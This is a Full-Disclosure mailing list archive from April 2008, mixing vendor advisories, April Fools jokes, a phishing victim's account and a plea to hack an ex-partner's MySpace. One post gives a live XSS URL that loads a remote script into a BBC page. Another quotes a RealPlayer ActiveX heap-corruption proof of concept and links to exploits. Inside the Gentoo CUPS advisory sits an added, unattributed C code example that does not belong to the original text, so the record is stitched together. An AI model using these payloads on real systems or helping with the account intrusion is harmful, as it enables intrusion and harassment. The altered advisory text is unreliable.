18.03.2008: As part of a communication on a similar issue in Outlook and Windows Live Mail, informed them that Office 2007 is vulnerable as well. For details on the earlier communication, see AKLINK-SA-2008-002 or AKLINK-SA-2008-003.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Workarounds:

- limit Office's ability to do HTTP requests, for example by setting an invalid proxy in the internet options. If possible, filter outgoing HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that the issue can be identified without doubt. In the past, I have been assigned CVE IDs directly and promptly by Steve Christey of MITRE. The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question of how to handle CVEs for a generic issue in an RFC that is vulnerable in a specific implementation.
01.02.2008: contacted Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first email and says:
| This can be a tough one for CVE, but if it's a fundamental design problem
| in a single RFC, and *any* conformant implementation will have the issue,
| then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the correct contact

From what I read on the CVE website, it looks like Microsoft assigns the CVE IDs for their own issues themselves, but they don't talk to me very much either. I like the CVE idea and would like to use CVE IDs whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Credits:

- Alexander Klink, Cynops GmbH (discovery)

-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink at cynops.de
mobile: +49 (0)178 2121703  | Cynops GmbH          | http://www.cynops.de
----------------------------+----------------------+---------------------
HRB 7833, Amtsgericht       | USt-Id: DE 213094986 | Geschäftsführer:
Bad Homburg v. d. Höhe      |                      | Martin Bartosch

From tecklord at securitylab.ru Tue Apr 1 10:38:40 2008
From: tecklord at securitylab.ru (Valery Marchuk)
Date: Tue, 1 Apr 2008 12:38:40 +0300
Subject: [Full-disclosure] UN against Open Source. Linux is a threat?
References: 
Message-ID: <627CE286524A4000B3318FDCF5074725@gw1>

BBC reports: Secretary-General Ban Ki-moon made an official statement supporting Windows Vista and Windows Server 2008.

"I believe a bug in OS Linux has allowed hackers to access Pentagon network and steal classified national security information and place blame on China", said Ban Ki-moon

More at

http://www.securitylab.ru/news/extra/349440.php (English)

or

http://www.securitylab.ru/news/349441.php (Russian)

with links to BBC and un.org.

BR,
Valery Marchuk
www.SecurityLab.ru

From s.u.n at free.Fr Tue Apr 1 11:18:14 2008
From: s.u.n at free.Fr (S/U/N)
Date: Tue, 01 Apr 2008 12:18:14 +0200
Subject: [Full-disclosure] UN against Open Source. Linux is a threat?
In-Reply-To: <627CE286524A4000B3318FDCF5074725@gw1>
References: <627CE286524A4000B3318FDCF5074725@gw1>
Message-ID: <47F20BE6.7070604@free.Fr>

Nice 1st of xss april!

http://www.bbc.co.uk/apps/ifl/fivelive/sportsquiz/quizengine?quiz=today&pagerType=pages%3Cscript%20src=http://www.securitylab.ru/test/1april.js%3E%3C/script%3E%3C!--&pagerData=1
From evilrabbi at gmail.com Tue Apr 1 14:58:13 2008
From: evilrabbi at gmail.com (evilrabbi)
Date: Tue, 1 Apr 2008 08:58:13 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
References: <1207026022.3142.287.camel@localhost> <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: 

Why would you release something like this without telling the vendor? What you did is irresponsible.

On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters wrote:
> Hahaha, nice find.
-- 
-- h0 h0 h0 --
www.nopsled.net
From razishaban at gmail.com Tue Apr 1 15:22:55 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Tue, 1 Apr 2008 18:22:55 +0400
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To: 
References: <1207026022.3142.287.camel@localhost> <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: <2d792fb20804010722g686e6b7aq8b9ea4b25cac91c4@mail.gmail.com>

April Fools!

-- 
Razi
From elazar at hushmail.com Tue Apr 1 15:28:47 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 01 Apr 2008 10:28:47 -0400
Subject: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game
Message-ID: <20080401142847.BCC6CD01A3@mailserver10.hushmail.com>

Let the foolz begin :) Happy April 1st!

On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>      METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES
>      AND A CLOSED SOURCE LICENSE AGREEMENT.
>
>After over a year and a half in stealth-mode, Metasploit Corporation has
>announced the 4.0 release of their flag-ship product, The Metasploit
>Framework. The new release comes jam-packed with exciting features that
>are sure to please even the German legal system. The following brief list
>includes some of the more fantastic changes.
>
>PWNCRAFT!
>
>Tired of fighting the good fight with the tried and true user interfaces
>you've come to expect from exploitation frameworks? Seeing a command
>shell for the 5000th time got you down? Well, you're in luck. Metasploit
>has decided to return to its rootz in '08 and focus on the
>exploitation-as-a-game model. PwnCraft brings the worlds of ownage and
>pwnage together for the first time in a revolutionary Real Time Strategy
>(RTS) world. Don't be fooled by the game-like interface, though! The
>actions you take in PwnCraft have a real effect on the world around you!
>Here's just a taste of some of the absolutely insane features you can
>look forward to:
>
> - Glide through enemy networks with a squadron of elegant winged pwnies
> - Launch devastating attacks against enemy ports in an all-out
>   IPS-evading TCP/IP assault
> - Use the fuzzy Burrowing Badger unit to discover 0day flaws in enemy
>   defenses
> - Conquer cities and install agents who can sabotage and smuggle other
>   units to new Vistas
> - An entirely in-game interface to the vulnerability sharing market to
>   improve your arsenal on the fly!
> - AND MORE!
>
>Beta testing of PwnCraft is currently underway and we are hoping to begin
>releasing it in stores at a retail price of $49.99 in Q3 2009. More
>details about the game can be found on the Metasploit website:
>
>http://metasploit.com/
>
>
>CLOSED SOURCE LICENSE
>
>After years of struggling to define Metasploit's licensing position, a
>final decision has been made to "screw it" and move the framework to a
>closed source license agreement. The decision was made to sell out for a
>number of reasons, not the least of which has to do with the benjamins.
>Metasploit 2.x and 3.x will no longer be available for public download.
>
>SPLOIT AT ME
>
>Get the latest exploits from Metasploit's patent-pending Sploit At Me
>service that delivers exploits on demand. You can rest assured that
>Metasploit's Sploit At Me service will attempt to compromise machines of
>your choosing with *99% reliability.
>
>About Metasploit Corporation
>
>Metasploit Corporation is an industry leader with thousands of non-paying
>customers world-wide. Metasploit delivers high-quality, top-notch,
>success-driven exploits to the security world as a one-stop-shop
>exploitation framework.
>
>
> * The other 1% of the time, your own machine will be compromised.
From elazar at hushmail.com Tue Apr 1 16:46:34 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 01 Apr 2008 11:46:34 -0400
Subject: [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption
Message-ID: <20080401154635.1A3551A0039@mailserver8.hushmail.com>

Now that this is patched...

http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/realplayer_console.rb

Elazar

On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad wrote:
>Who:
>Real Networks
>http://www.real.com
>
>What:
>Real Networks Real Player is a popular media player.
>
>How:
>Real Player utilizes an ActiveX control to play content within the
>user's browser.
>
>rmoc3260.dll version 6.0.10.45
>{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
>{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}
>
>It is possible to modify heap blocks after they are freed and
>overwrite certain registers, possibly allowing code execution.
>Like so:
>
>------------
>var buf = '';
>while (buf.length < 1005) buf = buf + 'A';
>
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m
>
>//repeat
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m --> Should crash here
>-------------
>
>Workaround:
>Set the killbit for this control.
>See http://support.microsoft.com/kb/240797
>
>Fix:
>No official fix known
>
>Exploit:
>Working on it
>
>Elazar

From DAVID.G.WESTON at saic.com Tue Apr 1 16:49:03 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Tue, 01 Apr 2008 08:49:03 -0700
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: 

I saw Nate do a 0day sploit on this at the Hard Rock Amsterdam!

On 3/31/08 10:18 PM, "Nate McFeters" wrote:
> Hahaha, nice find.
Thanks,
David Weston
Security Engineer
Science Application International Corporation
Web: http://www.saic.com/infosec
Email: DAVID.G.WESTON at saic.com
Office: 858-826-5435
Cell: 310-866-9713

From devin at debian.org Tue Apr 1 08:54:38 2008
From: devin at debian.org (Devin Carraway)
Date: Tue, 1 Apr 2008 09:54:38 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1533-2] New exiftags packages fix several vulnerabilities
Message-ID: <20080401075438.B19CE326A9E@morgana.loeki.tv>

------------------------------------------------------------------------
Debian Security Advisory DSA-1533-2                security at debian.org
http://www.debian.org/security/                            Devin Carraway
April 01, 2008                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : exiftags
Vulnerability  : insufficient input sanitizing
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-6354 CVE-2007-6355 CVE-2007-6356
Debian Bug     : 457062

Christian Schmid and Meder Kydyraliev (Google Security) discovered a number of vulnerabilities in exiftags, a utility for extracting EXIF metadata from JPEG images. This update merely adds the packages for Debian 3.1 sarge (oldstable) which were missing in the previous DSA.

The Common Vulnerabilities and Exposures project identified the following three problems:

CVE-2007-6354

    Inadequate EXIF property validation could lead to invalid memory accesses if executed on a maliciously crafted image, potentially including heap corruption and the execution of arbitrary code.
CVE-2007-6355

    Flawed data validation could lead to integer overflows, causing other invalid memory accesses, also with the potential for memory corruption or arbitrary code execution.

CVE-2007-6356

    Cyclical EXIF image file directory (IFD) references could cause a denial of service (infinite loop).

For the stable distribution (etch), these problems have been fixed in version 0.98-1.1+etch1.

For the oldstable distribution (sarge), these problems have been fixed in version 0.98-1.1+0sarge1.

For the unstable distribution (sid), these problems have been fixed in version 1.01-0.1.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
(Little Endian)) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_mipsel.deb Size/MD5 checksum: 60040 3bdbbf546125a75c00800cb4039b25ab powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_powerpc.deb Size/MD5 checksum: 54812 8d33fe8cb068bf1f02ce0c4a8cd3c8d0 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+0sarge1_s390.deb Size/MD5 checksum: 58208 9e7eeadcaefc2fe90aa11ece173348e2 Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1.dsc Size/MD5 checksum: 577 7b8743189acd9b4c0a7a25cabb5b753d http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1.diff.gz Size/MD5 checksum: 5128 2f82244bd73046f31b07e77a7381dd15 http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98.orig.tar.gz Size/MD5 checksum: 50195 5a8a4057c4dac1d765da5f9ef4527bdf alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_alpha.deb Size/MD5 checksum: 62970 e481f4f8ce70b25a648a2d3678d48e07 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_amd64.deb Size/MD5 checksum: 57924 a5a6906e8d05beeffc763379a9c45ba2 arm architecture (ARM) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_arm.deb Size/MD5 checksum: 56278 b06bf3f7722f034096719c7153fae5bd i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_i386.deb Size/MD5 checksum: 52558 ceed89333fd99a11d26765390ae35871 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_ia64.deb Size/MD5 checksum: 75164 ca893189af6fe68536774bac7dd357a1 mips architecture (MIPS (Big Endian)) 
http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_mips.deb Size/MD5 checksum: 61010 a5415b5fb389903c20c431a245fcb3fb mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_mipsel.deb Size/MD5 checksum: 60064 2961a652e3cb269a0671fe2281b2f017 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_powerpc.deb Size/MD5 checksum: 54734 23a4389bb781e0a054c1687986ac1b1a s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_s390.deb Size/MD5 checksum: 58988 38bf328294b2afe633ef99a5b97f3f1e sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/e/exiftags/exiftags_0.98-1.1+etch1_sparc.deb Size/MD5 checksum: 56132 d2e1cd3190fe528527beaacc2ef6be3f These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBR/HphGz0hbPcukPfAQIMhwgAlfBtUv2OIG9pd6b26OpGwV2zzXL7J23s TCokCtRNFuzH/KhWIN/c1j8N9sZda6EwsKSQtP7VIsGFCOW0iSOMcnf5uxHnP2kl m9+pPNn+HOBnqEU3Mj4f74rmpV/7d5yBnn20ap8IwGVjoYIqYJcPFnQrFEuNfFYY tOaP+M74btA9eINtvx2f9HpVnjyMcM9DpVhhvU+yu52sOWvNYtLL9WqakvUI74CF OcjpnHnLgWmcp6t++m2GpIj4YmsupWSJED6HhQDU+KphJTH89EnyFoDlj5Oyu8fL ax+JH27yqvy1b9M0TvLpV18ewPM6fCBdy9kvLDgOrbGh0N/WqzhbfQ== =qSYx -----END PGP SIGNATURE----- From lassiterxavier at yahoo.com Tue Apr 1 00:58:12 2008 From: lassiterxavier at yahoo.com (Xavier lassiter) Date: Mon, 31 Mar 2008 16:58:12 -0700 (PDT) Subject: [Full-disclosure] Xbox live 
accounts are being stolen (update) Message-ID: <672631.87889.qm@web63011.mail.re1.yahoo.com> Hi My Name Is Xavier And You said to send you any info on Hacked Xbox live accounts just like to tell you my account was also Hacked since Wednesday march 26th 2008 I been talking to Xbox for two weeks now its march 31st well me and two of my friends accounts got stolen by my friend giving me this web site for free Microsoft Points like (Excuse me for my language) Like a Fucking Dumb ass I went to the web site I looks just like a Xbox web site here is a link www.freempz.110mb.com when you look at the website it looks so real so I put in my e-mail address and password just like Xbox.com and it signed me in nothing happened so I got off my computer and went on my Xbox and a few minutes later I get a friend request from another person it was my friend and he told me not to go to that web site because they took his information when he told me that I went to change my information it was too late the email was changed and the password so what I did was I was going to stay on but it kicked me off I did not say I signed off but I tried to sign back in it said that my account was recovered so I called Xbox I'm going to try to remember everything ok I called them and I told them my account was stolen they did not know what the hell I was talking about after I spent five minutes explaining to them that my account was stolen so they man I was talking to asked me for the gamertag Xman1231 they they asked me what was the address oh and this is on the first day and he asked me what was my secret password what was my pets name first I said I don't have a pet and I told him that I put my favorite food and I told him that everything was changed my address name last name everything they that's when the guy got what the hell I was talking about it would been good if I wrote their names down but I did not let me get back the subject at hand ok then they put me on hold and then they put me on hold
again and that's when they put me in contact with the supervisor Matt I talked to him and everything and he said that he can suspend the account oh while this was happening they puck ass hacker was on my account but the I told they guy everything I told the man I was talking to that was they supervisor told me they will be in contact with me at the end of this week or next week in my mind I know they're not going to call but they supervisor told me that I can make another account while I wait for their call he gave me a reference number and I got off the phone and I made a new account and I was thinking that can they just remove the email address and password that's there and add a new one but it was too late to call I apologize for my writing and thank you for reading this e-mail. if any question to asked you can contact me at my e-mail address lassiterxavier at yahoo.com ____________________________________________________________________________________ You rock. That's why Blockbuster's offering you one month of Blockbuster Total Access, No Cost. http://tc.deals.yahoo.com/tc/blockbuster/text5.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080331/f3f8d060/attachment.html From druid at caughq.org Tue Apr 1 18:27:05 2008 From: druid at caughq.org (I)ruid) Date: Tue, 01 Apr 2008 12:27:05 -0500 Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition In-Reply-To: References: <1207026022.3142.287.camel@localhost> <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com> Message-ID: <1207070825.3142.293.camel@localhost> On Tue, 2008-04-01 at 08:58 -0500, evilrabbi wrote: > Why would you release something like this without telling the vendor? > What you did is irresponsible.
That is /exactly/ correct: http://www.caughq.org/advisories/disclosure.html -- I)ruid, C²ISSP druid at caughq.org http://druid.caughq.org -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/e9db127e/attachment.bin From Valdis.Kletnieks at vt.edu Tue Apr 1 18:34:03 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 01 Apr 2008 13:34:03 -0400 Subject: [Full-disclosure] Xbox live accounts are being stolen (update) In-Reply-To: Your message of "Mon, 31 Mar 2008 16:58:12 PDT." <672631.87889.qm@web63011.mail.re1.yahoo.com> References: <672631.87889.qm@web63011.mail.re1.yahoo.com> Message-ID: <6380.1207071243@turing-police.cc.vt.edu> On Mon, 31 Mar 2008 16:58:12 PDT, Xavier lassiter said: > info on Hacked Xbox live accounts just like to tell you my account was also > Hacked since Wednesday march 26th 2008 I been talking to Xbox for two weeks now So you've been talking to them for two weeks about something that happened less than a week ago. Moral: If you don't even know what day of the week it is, you probably shouldn't be using the Internet. -------------- next part -------------- A non-text attachment was scrubbed...
Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/c307bd58/attachment.bin From blah at blakogre.com Tue Apr 1 19:13:58 2008 From: blah at blakogre.com (blah) Date: Tue, 1 Apr 2008 11:13:58 -0700 Subject: [Full-disclosure] Xbox live accounts are being stolen (update) In-Reply-To: <672631.87889.qm@web63011.mail.re1.yahoo.com> References: <672631.87889.qm@web63011.mail.re1.yahoo.com> Message-ID: <28f529ba0804011113l3720982cq90feba4b94eb1e2d@mail.gmail.com> I'd like to introduce you to a new friend you haven't met before: http://images.jupiterimages.com/common/detail/80/16/22421680.jpg "march 26th 2008 I been talking to Xbox for two weeks now its march 31st " Hacked 3/26. Now 3/31. 2 weeks? Here: http://www.amazon.com/Subtraction-Flash-Cards-Pack-54/dp/0307249522/ref=pd_bbs_sr_1?ie=UTF8&s=books&qid=1207073496&sr=8-1 All of that aside, hope you get things restored. 2008/3/31 Xavier lassiter : > > > Hi My Name Is Xavier And You said to send you any info on Hacked Xbox live > accounts just like to tell you my account was also Hacked since Wednesday > march 26th 2008 I been talking to Xbox for two weeks now its march 31st well > me and two of my friends accounts got stolen by my friend giving me this web > site for free Microsoft Points like (Excuse me for my langue) Like a Fucking > Dumb ass I went to the web site I looks just like a Xbox web site here is a > link www.freempz.110mb.com when you look at the website it looks so real so > I put in my e-mail address and password just like Xbox.com and it signed me > in nothing happened so I got of my computer and went on my Xbox and a few > minutes later I get a friend request from another person it was my friend > and he told me not to go to that web site because they took his information > when he told me that I went to change my information it was to late the > email was changed and the password so what I did 
was I was going to stay on > but it kicked me of I did not say I singed off but I tried to sign back in > it said that my account was recovered so I called Xbox im going to try to > remember everything ok I called them and I told them my account was stolen > they did not know what the hell I was talking about after I spent Five > minutes explaining to them that my account was stolen so they man I was > talking to asked me for the gamertag Xman1231 they they asked me what was > the address oh and this is on the first day and he asked me what was my > secret password what was my pets name first I said I don't have a pet and I > told him that I put my favorite food and I told him that everything was > changed my address name last name everything they that's when the guy got > what the hell I was talking about it would been good if I wrote there names > down but I did not let me get back the subject at hand ok then they put me > on hold and then they put me on hold again and that's when they put me in > contact with the supervisor Matt I talked to him and everything and he said > that he can suspend the account oh while this was happening they puck ass > hacker was on my account but the I told they guy everything I told the man I > was talking to that was they supervisor told me they will be in contact with > me at the end of this week or next week in my mind I know there not going to > call but they supervisor told me that I can make another account while I > wait for there call he gave me a reference number and I got off the phone > and I made a new account and I was thinking that can they just remove the > email address and pass word that's there and add a new one but it was to > late to call I apologize for my writing and thank you for reading this > e-mail. if any question to asked you can contact me at my e-mail address > lassiterxavier at yahoo.com > > ________________________________ > OMG, Sweet deal for Yahoo! 
users/friends: Get A Month of Blockbuster Total
> Access, No Cost. W00t
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: images.jpg
Type: image/jpeg
Size: 2422 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/a2dfc991/attachment.jpg

From rbu at gentoo.org Tue Apr 1 20:17:06 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 1 Apr 2008 21:17:06 +0200
Subject: [Full-disclosure] [ GLSA 200804-01 ] CUPS: Multiple vulnerabilities
Message-ID: <200804012117.06507.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200804-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: CUPS: Multiple vulnerabilities
      Date: April 01, 2008
      Bugs: #211449, #212364, #214068
        ID: 200804-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in CUPS, allowing for the remote execution of arbitrary code and a Denial of Service.

Background
==========

CUPS provides a portable printing layer for UNIX-based operating systems.
Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-print/cups         < 1.2.12-r7                     >= 1.2.12-r7

Description
===========

Multiple vulnerabilities have been reported in CUPS:

* regenrecht (VeriSign iDefense) discovered that the cgiCompileSearch() function used in several CGI scripts in CUPS' administration interface does not correctly calculate boundaries when processing a user-provided regular expression, leading to a heap-based buffer overflow (CVE-2008-0047).

* Helge Blischke reported a double free() vulnerability in the process_browse_data() function when adding or removing remote shared printers (CVE-2008-0882).

* Tomas Hoger (Red Hat) reported that the gif_read_lzw() function uses the code_size value from GIF images without properly checking it, leading to a buffer overflow (CVE-2008-1373).

* An unspecified input validation error was discovered in the HP-GL/2 filter (CVE-2008-0053).

Impact
======

A local attacker could send specially crafted network packets or print jobs and possibly execute arbitrary code with the privileges of the user running CUPS (usually lp), or cause a Denial of Service. The vulnerabilities are exploitable via the network when CUPS is sharing printers remotely.

Workaround
==========

There is no known workaround at this time.
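An added example for the gif_read_lzw() item in the advisory above, written for this page and not CUPS code: what validating the LZW code size looks like. A GIF image data block opens with a one-byte LZW minimum code size; a decoder derives the initial code width, the clear and end-of-information codes and its string-table indices from that byte, so trusting it lets a crafted image push those indices past a fixed 4096-entry table. The 2..8 range used here follows from the GIF89a limits (at most 8 bits per pixel, minimum code size at least 2); the exact check CUPS adopted is not stated in the advisory, and the lzw_state layout and demo_* helpers are the example's own.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example, not CUPS code: validate the LZW minimum code size byte at the
 * start of a GIF image data block before deriving anything from it, and cap
 * string-table growth at the 12-bit limit. */

#define LZW_MAX_BITS   12
#define LZW_TABLE_SIZE (1 << LZW_MAX_BITS)   /* 4096 entries, the GIF maximum */

typedef struct {
    int code_size;    /* current code width in bits */
    int clear_code;   /* 1 << minimum code size */
    int eoi_code;     /* clear_code + 1 */
    int next_free;    /* next unused table slot */
    int max_code;     /* largest code at the current width */
    int prefix[LZW_TABLE_SIZE];
    uint8_t suffix[LZW_TABLE_SIZE];
} lzw_state;

/* Hardened initialisation. An unchecked decoder does
 *   code_size = byte + 1; clear_code = 1 << byte;
 * and then indexes its fixed-size table with codes derived from those values;
 * a byte of 12, for instance, puts clear_code at 4096, one past the table. */
int lzw_init(lzw_state *st, uint8_t byte_from_file)
{
    if (byte_from_file < 2 || byte_from_file > 8)   /* GIF89a range (assumed) */
        return -1;
    st->code_size  = byte_from_file + 1;
    st->clear_code = 1 << byte_from_file;
    st->eoi_code   = st->clear_code + 1;
    st->next_free  = st->eoi_code + 1;
    st->max_code   = (1 << st->code_size) - 1;
    for (int i = 0; i < st->clear_code; i++) {    /* root entries: single bytes */
        st->prefix[i] = -1;
        st->suffix[i] = (uint8_t)i;
    }
    return 0;
}

/* Adds one table entry; refuses once all 4096 slots are used, which is where
 * an unchecked decoder would write past the table. */
int lzw_add_entry(lzw_state *st, int prefix, uint8_t suffix)
{
    if (st->next_free >= LZW_TABLE_SIZE)
        return -1;
    st->prefix[st->next_free] = prefix;
    st->suffix[st->next_free] = suffix;
    st->next_free++;
    if (st->next_free > st->max_code && st->code_size < LZW_MAX_BITS) {
        st->code_size++;                              /* widen codes, up to 12 bits */
        st->max_code = (1 << st->code_size) - 1;
    }
    return 0;
}

/* Demo helpers on a static state so the outcome can be checked from outside. */
static lzw_state g_st;

int gif_code_size_ok(uint8_t b) { return lzw_init(&g_st, b); }

int demo_clear_code(uint8_t b)
{
    return lzw_init(&g_st, b) == 0 ? g_st.clear_code : -1;
}

/* Fills the table from a fresh state; returns entries added, or -1 on a bad size. */
int demo_fill_table(uint8_t b)
{
    if (lzw_init(&g_st, b) != 0)
        return -1;
    int added = 0;
    while (lzw_add_entry(&g_st, 0, 0) == 0)
        added++;
    return added;
}

int demo_final_code_size(uint8_t b)
{
    return demo_fill_table(b) < 0 ? -1 : g_st.code_size;
}

int main(void)
{
    printf("size 8 ok=%d, size 12 ok=%d, size 255 ok=%d\n",
           gif_code_size_ok(8), gif_code_size_ok(12), gif_code_size_ok(255));
    printf("min size 2: %d entries added, final width %d bits\n",
           demo_fill_table(2), demo_final_code_size(2));
    return 0;
}
```

The two guards do different jobs: lzw_init() rejects a code-size byte the format cannot produce before any table index is computed from it, and lzw_add_entry() keeps a stream that never sends a clear code from growing the table past 4096 entries, so neither the crafted header byte nor a long run of codes can move a write outside the arrays.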
Resolution
==========

All CUPS users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r7"

References
==========

  [ 1 ] CVE-2008-0047
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
  [ 2 ] CVE-2008-0053
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0053
  [ 3 ] CVE-2008-0882
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0882
  [ 4 ] CVE-2008-1373
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/afb4bed8/attachment.bin

From codyroby at hotmail.com Tue Apr 1 20:31:38 2008
From: codyroby at hotmail.com (Cody Roby)
Date: Tue, 1 Apr 2008 15:31:38 -0400
Subject: [Full-disclosure] (no subject)
Message-ID:

Alright, I have a crazy ex who keeps posting malicious things about me on her MySpace and I would like to know how to use HTML errors to hack her MySpace. I saw a previous post, but the code has been removed. Please help.
